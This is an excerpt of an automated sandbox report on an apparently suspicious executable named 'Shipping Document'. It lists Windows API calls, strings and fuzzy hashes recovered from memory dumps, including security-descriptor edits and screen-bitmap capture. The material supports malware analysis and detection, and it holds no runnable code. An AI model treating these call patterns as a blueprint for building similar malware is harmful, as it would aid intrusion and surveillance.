                              • LoadCursorW.USER32(00000000,00007F04), ref: 010353A3
                              • LoadCursorW.USER32(00000000,00007F02), ref: 010353AE
                              • GetCursorInfo.USER32(?), ref: 010353BE
                              • GetLastError.KERNEL32(00000001,00000000), ref: 010353E9
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: Cursor$Load$ErrorInfoLast
                              • String ID:
                              • API String ID: 3215588206-0
                              • Opcode ID: dfe7195430f015a13c50b1e10f55b0612a5bfc8861ebe5aa45ec5b904f47ebc3
                              • Instruction ID: 89d4e85903ac44d87f5df2d23e7f531e632e38c10c91681963b4aaabecd764af
                              • Opcode Fuzzy Hash: dfe7195430f015a13c50b1e10f55b0612a5bfc8861ebe5aa45ec5b904f47ebc3
                              • Instruction Fuzzy Hash: 07414370E083196ADB109FBA8C49D6EFFFCEF91B50F10452FA549E7290DAB89501CE51
                              APIs
                              • GetClassNameW.USER32(?,?,00000100), ref: 0101AAA5
                              • __swprintf.LIBCMT ref: 0101AB46
                              • _wcscmp.LIBCMT ref: 0101AB59
                              • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 0101ABAE
                              • _wcscmp.LIBCMT ref: 0101ABEA
                              • GetClassNameW.USER32(?,?,00000400), ref: 0101AC21
                              • GetDlgCtrlID.USER32(?), ref: 0101AC73
                              • GetWindowRect.USER32(?,?), ref: 0101ACA9
                              • GetParent.USER32(?), ref: 0101ACC7
                              • ScreenToClient.USER32(00000000), ref: 0101ACCE
                              • GetClassNameW.USER32(?,?,00000100), ref: 0101AD48
                              • _wcscmp.LIBCMT ref: 0101AD5C
                              • GetWindowTextW.USER32(?,?,00000400), ref: 0101AD82
                              • _wcscmp.LIBCMT ref: 0101AD96
                                • Part of subcall function 00FE386C: _iswctype.LIBCMT ref: 00FE3874
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                              • String ID: %s%u
                              • API String ID: 3744389584-679674701
                              • Opcode ID: b40fe44c3c9401b351865be3e338d3c823f10f3f72cd9851e25eec1560ac9ec9
                              • Instruction ID: 4c25d6ce40bf311e5cedfdae06e5b88ee5491c36bb69bc2df0374a00cc74b773
                              • Opcode Fuzzy Hash: b40fe44c3c9401b351865be3e338d3c823f10f3f72cd9851e25eec1560ac9ec9
                              • Instruction Fuzzy Hash: 3EA1FD71305686EFD715EE68C884BAABBE8FF04315F404629FADAC3185DB38E545CB90
                              APIs
                              • GetClassNameW.USER32(00000008,?,00000400), ref: 0101B3DB
                              • _wcscmp.LIBCMT ref: 0101B3EC
                              • GetWindowTextW.USER32(00000001,?,00000400), ref: 0101B414
                              • CharUpperBuffW.USER32(?,00000000), ref: 0101B431
                              • _wcscmp.LIBCMT ref: 0101B44F
                              • _wcsstr.LIBCMT ref: 0101B460
                              • GetClassNameW.USER32(00000018,?,00000400), ref: 0101B498
                              • _wcscmp.LIBCMT ref: 0101B4A8
                              • GetWindowTextW.USER32(00000002,?,00000400), ref: 0101B4CF
                              • GetClassNameW.USER32(00000018,?,00000400), ref: 0101B518
                              • _wcscmp.LIBCMT ref: 0101B528
                              • GetClassNameW.USER32(00000010,?,00000400), ref: 0101B550
                              • GetWindowRect.USER32(00000004,?), ref: 0101B5B9
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                              • String ID: @$ThumbnailClass
                              • API String ID: 1788623398-1539354611
                              • Opcode ID: a5c5cc9d25db6483d906456cfbb9c3972d2f3f97fb97a03f30798b1c00aae8d7
                              • Instruction ID: 3b2d5cbdfcc2f533e27be158888341f6280ff5605d4e7b6f688c59c39263b865
                              • Opcode Fuzzy Hash: a5c5cc9d25db6483d906456cfbb9c3972d2f3f97fb97a03f30798b1c00aae8d7
                              • Instruction Fuzzy Hash: 4081CF710083069BEB11DF19C985FAA7BE8FF44314F0885A9FDC58A09ADB3CD945CBA1
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: __wcsnicmp
                              • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                              • API String ID: 1038674560-1810252412
                              • Opcode ID: 03ffda5206e49e52c39fe8bd22c036e83557175aee52a5b539162df8f8493fa6
                              • Instruction ID: bf906cc2b85eecad6fcafa485073fe077dfd7d20649641ce320a98287874de22
                              • Opcode Fuzzy Hash: 03ffda5206e49e52c39fe8bd22c036e83557175aee52a5b539162df8f8493fa6
                              • Instruction Fuzzy Hash: C131A031A44306A6DB10FA62CE47FEEB7B4AF14B60F60012DF481760D6EF6D6E08D955
                              APIs
                              • LoadIconW.USER32(00000063), ref: 0101C4D4
                              • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0101C4E6
                              • SetWindowTextW.USER32(?,?), ref: 0101C4FD
                              • GetDlgItem.USER32(?,000003EA), ref: 0101C512
                              • SetWindowTextW.USER32(00000000,?), ref: 0101C518
                              • GetDlgItem.USER32(?,000003E9), ref: 0101C528
                              • SetWindowTextW.USER32(00000000,?), ref: 0101C52E
                              • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 0101C54F
                              • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 0101C569
                              • GetWindowRect.USER32(?,?), ref: 0101C572
                              • SetWindowTextW.USER32(?,?), ref: 0101C5DD
                              • GetDesktopWindow.USER32 ref: 0101C5E3
                              • GetWindowRect.USER32(00000000), ref: 0101C5EA
                              • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 0101C636
                              • GetClientRect.USER32(?,?), ref: 0101C643
                              • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 0101C668
                              • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 0101C693
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                              • String ID:
                              • API String ID: 3869813825-0
                              • Opcode ID: 692f594a158804cb9672937444fb4852770d93d56d4f3b643630bed89ec1fb3b
                              • Instruction ID: 33180d19443c83411e0a6bccd0a359586ad4b3cd8428632e810c370006c227aa
                              • Opcode Fuzzy Hash: 692f594a158804cb9672937444fb4852770d93d56d4f3b643630bed89ec1fb3b
                              • Instruction Fuzzy Hash: CA51617094070AAFEB20DFA8DE85B6EBBF5FF04705F004958E686A25A4C779E944CB50
                              APIs
                              • _memset.LIBCMT ref: 0104A4C8
                              • DestroyWindow.USER32(?,?), ref: 0104A542
                                • Part of subcall function 00FC7D2C: _memmove.LIBCMT ref: 00FC7D66
                              • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0104A5BC
                              • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0104A5DE
                              • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0104A5F1
                              • DestroyWindow.USER32(00000000), ref: 0104A613
                              • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00FC0000,00000000), ref: 0104A64A
                              • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0104A663
                              • GetDesktopWindow.USER32 ref: 0104A67C
                              • GetWindowRect.USER32(00000000), ref: 0104A683
                              • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0104A69B
                              • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0104A6B3
                                • Part of subcall function 00FC25DB: GetWindowLongW.USER32(?,000000EB), ref: 00FC25EC
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                              • String ID: 0$tooltips_class32
                              • API String ID: 1297703922-3619404913
                              • Opcode ID: 4af28a1ce099683c55e639ac04736e7f4fe32ccf03a8e4ab79ca9443ca73c36d
                              • Instruction ID: 379f638d7d0791fe695189d67530a9cbefdf5f0ca7d2b084e298ca55d927f94e
                              • Opcode Fuzzy Hash: 4af28a1ce099683c55e639ac04736e7f4fe32ccf03a8e4ab79ca9443ca73c36d
                              • Instruction Fuzzy Hash: 0C717CB5244205EFE720DF28C885F6A7BE5FB88300F44456DFAC687251D776E905CB61
                              APIs
                                • Part of subcall function 00FC2612: GetWindowLongW.USER32(?,000000EB), ref: 00FC2623
                              • DragQueryPoint.SHELL32(?,?), ref: 0104C917
                                • Part of subcall function 0104ADF1: ClientToScreen.USER32(?,?), ref: 0104AE1A
                                • Part of subcall function 0104ADF1: GetWindowRect.USER32(?,?), ref: 0104AE90
                                • Part of subcall function 0104ADF1: PtInRect.USER32(?,?,0104C304), ref: 0104AEA0
                              • SendMessageW.USER32(?,000000B0,?,?), ref: 0104C980
                              • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0104C98B
                              • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0104C9AE
                              • _wcscat.LIBCMT ref: 0104C9DE
                              • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0104C9F5
                              • SendMessageW.USER32(?,000000B0,?,?), ref: 0104CA0E
                              • SendMessageW.USER32(?,000000B1,?,?), ref: 0104CA25
                              • SendMessageW.USER32(?,000000B1,?,?), ref: 0104CA47
                              • DragFinish.SHELL32(?), ref: 0104CA4E
                              • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0104CB41
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                              • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                              • API String ID: 169749273-3440237614
                              • Opcode ID: 7686ffa40c8619a5f466819e55ce0e2d384d3397c85455c2ecab49ffd4a4cf34
                              • Instruction ID: 79c2c68db08e8154ebe8f7ea3773b94a54181c4a0e08bfb491f225bf4299e55d
                              • Opcode Fuzzy Hash: 7686ffa40c8619a5f466819e55ce0e2d384d3397c85455c2ecab49ffd4a4cf34
                              • Instruction Fuzzy Hash: 8A619CB1108302AFC710EF64CD85E9FBBE8EF88750F000A1DF5D5961A1DB759A09DB92
                              APIs
                              • CharUpperBuffW.USER32(?,?), ref: 010446AB
                              • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 010446F6
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: BuffCharMessageSendUpper
                              • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                              • API String ID: 3974292440-4258414348
                              • Opcode ID: a616b81e21b381446c0072b1f3d165300f043a4ca174a81118ce3a28eec86230
                              • Instruction ID: 98a90872809e7599f46cb850fa78923eef203ceceb95bc0116ab3f20e3c96c05
                              • Opcode Fuzzy Hash: a616b81e21b381446c0072b1f3d165300f043a4ca174a81118ce3a28eec86230
                              • Instruction Fuzzy Hash: 67919F746043029BCB14EF14C891B6DB7E1BF94314F0044ACA8D69B7A2CF79ED4ADB41
                              APIs
                                • Part of subcall function 00FC9997: __itow.LIBCMT ref: 00FC99C2
                                • Part of subcall function 00FC9997: __swprintf.LIBCMT ref: 00FC9A0C
                              • CharLowerBuffW.USER32(?,?), ref: 0102A636
                              • GetDriveTypeW.KERNEL32 ref: 0102A683
                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0102A6CB
                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0102A702
                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0102A730
                                • Part of subcall function 00FC7D2C: _memmove.LIBCMT ref: 00FC7D66
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                              • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                              • API String ID: 2698844021-4113822522
                              • Opcode ID: 896c4c2724268be7f426ef14c606eb71465ef82120f3ae939f85c170c377532f
                              • Instruction ID: 791e93c8ea47caa3f78d35661c0aa968f3c2393ef3697ee42d99e153ad594963
                              • Opcode Fuzzy Hash: 896c4c2724268be7f426ef14c606eb71465ef82120f3ae939f85c170c377532f
                              • Instruction Fuzzy Hash: DE5129716043069FC710EF25CD82D6AB7E4FF88718F04495CF89A97251DB39AE09DB51
                              APIs
                              • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0102A47A
                              • __swprintf.LIBCMT ref: 0102A49C
                              • CreateDirectoryW.KERNEL32(?,00000000), ref: 0102A4D9
                              • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0102A4FE
                              • _memset.LIBCMT ref: 0102A51D
                              • _wcsncpy.LIBCMT ref: 0102A559
                              • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0102A58E
                              • CloseHandle.KERNEL32(00000000), ref: 0102A599
                              • RemoveDirectoryW.KERNEL32(?), ref: 0102A5A2
                              • CloseHandle.KERNEL32(00000000), ref: 0102A5AC
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                              • String ID: :$\$\??\%s
                              • API String ID: 2733774712-3457252023
                              • Opcode ID: 9401c972ef9423836056ddecb8503b2332a9877aaf62978ecc3890b5e1754d6d
                              • Instruction ID: ef987a842248cc86656e45d6cde76b37c474024b90152a616632af4b8cb2472c
                              • Opcode Fuzzy Hash: 9401c972ef9423836056ddecb8503b2332a9877aaf62978ecc3890b5e1754d6d
                              • Instruction Fuzzy Hash: F631D2B560012AABDB219FA4DC88FEB77BCEF88701F1041B6FA48D3055EB7493448B24
                              APIs
                              • __wsplitpath.LIBCMT ref: 0102DC7B
                              • _wcscat.LIBCMT ref: 0102DC93
                              • _wcscat.LIBCMT ref: 0102DCA5
                              • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0102DCBA
                              • SetCurrentDirectoryW.KERNEL32(?), ref: 0102DCCE
                              • GetFileAttributesW.KERNEL32(?), ref: 0102DCE6
                              • SetFileAttributesW.KERNEL32(?,00000000), ref: 0102DD00
                              • SetCurrentDirectoryW.KERNEL32(?), ref: 0102DD12
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                              • String ID: *.*
                              • API String ID: 34673085-438819550
                              • Opcode ID: f698f4c8425d69a178e1001cf494dd09d1adeb2479c2e03a885bf7eb5f4b0311
                              • Instruction ID: aea918371ce5fd2f03f6f7b17f131b9b11ee4c6a71cb96f24016393e9790a27f
                              • Opcode Fuzzy Hash: f698f4c8425d69a178e1001cf494dd09d1adeb2479c2e03a885bf7eb5f4b0311
                              • Instruction Fuzzy Hash: 4681D171504255DFDB60EFA8C8959AEB7E8BB88310F18886EF9C9C7211E634ED44CB52
                              APIs
                                • Part of subcall function 00FC2612: GetWindowLongW.USER32(?,000000EB), ref: 00FC2623
                              • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0104C4EC
                              • GetFocus.USER32 ref: 0104C4FC
                              • GetDlgCtrlID.USER32(00000000), ref: 0104C507
                              • _memset.LIBCMT ref: 0104C632
                              • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 0104C65D
                              • GetMenuItemCount.USER32(?), ref: 0104C67D
                              • GetMenuItemID.USER32(?,00000000), ref: 0104C690
                              • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 0104C6C4
                              • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 0104C70C
                              • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0104C744
                              • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 0104C779
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                              • String ID: 0
                              • API String ID: 1296962147-4108050209
                              • Opcode ID: 5f70a2ed2bd6265cf41d09bd88d564fe8aeb8a35e6a30d95112b558ff570245a
                              • Instruction ID: 935b489cf732cc905725ce976b578e20fe037bf8e10c7056debe5cdca7ecdde2
                              • Opcode Fuzzy Hash: 5f70a2ed2bd6265cf41d09bd88d564fe8aeb8a35e6a30d95112b558ff570245a
                              • Instruction Fuzzy Hash: 68818FB01093019FE761DF18CAC4A6BBBE8FB88314F00456DF9D593251D731E905CBA2
                              APIs
                                • Part of subcall function 0101874A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 01018766
                                • Part of subcall function 0101874A: GetLastError.KERNEL32(?,0101822A,?,?,?), ref: 01018770
                                • Part of subcall function 0101874A: GetProcessHeap.KERNEL32(00000008,?,?,0101822A,?,?,?), ref: 0101877F
                                • Part of subcall function 0101874A: HeapAlloc.KERNEL32(00000000,?,0101822A,?,?,?), ref: 01018786
                                • Part of subcall function 0101874A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0101879D
                                • Part of subcall function 010187E7: GetProcessHeap.KERNEL32(00000008,01018240,00000000,00000000,?,01018240,?), ref: 010187F3
                                • Part of subcall function 010187E7: HeapAlloc.KERNEL32(00000000,?,01018240,?), ref: 010187FA
                                • Part of subcall function 010187E7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,01018240,?), ref: 0101880B
                              • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 01018458
                              • _memset.LIBCMT ref: 0101846D
                              • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0101848C
                              • GetLengthSid.ADVAPI32(?), ref: 0101849D
                              • GetAce.ADVAPI32(?,00000000,?), ref: 010184DA
                              • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 010184F6
                              • GetLengthSid.ADVAPI32(?), ref: 01018513
                              • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 01018522
                              • HeapAlloc.KERNEL32(00000000), ref: 01018529
                              • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0101854A
                              • CopySid.ADVAPI32(00000000), ref: 01018551
                              • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 01018582
                              • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 010185A8
                              • SetUserObjectSecurity.USER32(?,00000004,?), ref: 010185BC
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                              • String ID:
                              • API String ID: 3996160137-0
                              • Opcode ID: b2f6e3508c03a77d3cca0204a58a4c30524f51b02ac28ff11c54aab36fa9c959
                              • Instruction ID: 2c7064d297ee35d75116c86521a13552edc59dcdacbab66726ab3174468bd597
                              • Opcode Fuzzy Hash: b2f6e3508c03a77d3cca0204a58a4c30524f51b02ac28ff11c54aab36fa9c959
                              • Instruction Fuzzy Hash: D3615E7590020AAFDF10DF98DD84AEEBBB9FF44310F04815AF955A7284DB399A15CF60
                              APIs
                              • GetDC.USER32(00000000), ref: 010376A2
                              • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 010376AE
                              • CreateCompatibleDC.GDI32(?), ref: 010376BA
                              • SelectObject.GDI32(00000000,?), ref: 010376C7
                              • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 0103771B
                              • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 01037757
                              • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 0103777B
